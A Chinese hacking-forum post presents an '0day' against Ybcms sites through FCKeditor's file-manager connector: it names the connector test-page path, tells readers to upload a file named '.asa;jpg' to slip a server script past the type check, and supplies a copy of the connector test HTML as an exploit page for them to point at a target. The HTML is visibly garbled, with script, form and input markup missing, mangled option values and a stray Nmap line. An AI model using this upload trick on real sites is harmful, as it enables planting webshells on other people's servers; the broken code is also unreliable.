Ybcms通杀0day

作者：hack1990 时间：11-11-01 阅读数：546人阅读

FCKEDITOR的上传漏洞：fck/editor/filemanager/connectors/test.html

上传.asa;jpg

没有TEST.HTML的，保存下面EXP.自己填上网址

<!--

* FCKeditor - The text editor for Internet - http://www.fckeditor.net

* == BEGIN LICENSE ==

* Licensed under the terms of any of the following licenses at your

* choice:

* - GNU General Public License Version 2 or later (the "GPL")

* http://www.gnu.org/licenses/gpl.html

* - GNU Lesser General Public License Version 2.1 or later (the "LGPL")

* http://www.gnu.org/licenses/lgpl.html

* - Mozilla Public License Version 1.1 or later (the "MPL")

* http://www.mozilla.org/MPL/MPL-1.1.html

* == END LICENSE ==

* Test page for the File Browser connectors.

-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<head>

<title>FCKeditor - Connectors Tests</title>

function BuildBaseUrl( command )

{

var sUrl =

document.getElementById('cmbConnector').value +

'?Command=' + command +

'&Type=' + document.getElementById('cmbType').value +

'&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;

return sUrl ;

}

function SetFrameUrl( url )

{

document.getElementById('eRunningFrame').src = url ;

document.getElementById('eUrl').innerHTML = url ;

}

function GetFolders()

{

SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;

return false ;

}

function GetFoldersAndFiles()

{

SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;

return false ;

}

function CreateFolder()

{

var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;

if ( ! sFolder )

return false ;

var sUrl = BuildBaseUrl( 'CreateFolder' ) ;

sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;

SetFrameUrl( sUrl ) ;

return false ;

}

function OnUploadCompleted( errorNumber, fileName )

{

switch ( errorNumber )

{

case 0 :

alert( 'File uploaded with no errors' ) ;

break ;

case 201 :

GetFoldersAndFiles() ;

alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;

break ;

case 202 :

alert( 'Invalid file' ) ;

break ;

default :

alert( 'Error on file upload. Error number: ' + errorNumber ) ;

break ;

}

this.frames.frmUpload = this ;

function SetAction()

{

var sUrl = BuildBaseUrl( 'FileUpload' ) ;

document.getElementById('eUrl').innerHTML = sUrl ;

document.getElementById('frmUpload').action = sUrl ;

}

</script>

</head>

<body>

<tr>

<td>

<tr>

<td>

Connector:<br />

<option value="ASP.Net</option'>http:///fck/editor/filemanager/connectors/aspx/connector.asp">ASP.Net</option>

<option value="cfm/connector.cfm">ColdFusion</option>

<option value="lasso/connector.lasso">Lasso</option>

<option value="PHP</option'>http:///fck/editor/filemanager/connectors/php/connector.php">PHP</option>

<option value="py/connector.py">Python</option>

</select>

</td>

<td>

</td>

<td>

Current Folder<br />

<td>

</td>

<td>

Resource Type<br />

<option value="Image">Image</option>

<option value="Flash">Flash</option>

<option value="Media">Media</option>

<option value="Invalid">Invalid Type (for testing)</option>

</select>

</td>

</tr>

</table>

<br />

<tr>

<a href="#" onclick="GetFolders();">Get Folders</a></td>

<td>

</td>

<a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>

<td>

</td>

<a href="#" onclick="CreateFolder();">Create Folder</a></td>

<td>

</td>

File Upload<br />

</form>

</td>

</tr>

</table>

<br />

URL: <span id="eUrl"></span>

</td>

</tr>

<tr>

height="100%"></iframe>

</td>

</tr>

</table>

</body>

</html>

# Nmap Security Scanner 7.0

上一篇：WordPress插件WP WordPress SQL注射缺陷

下一篇：一次Linux低权限提权

Ybcms通杀0day

相关文章

发表评论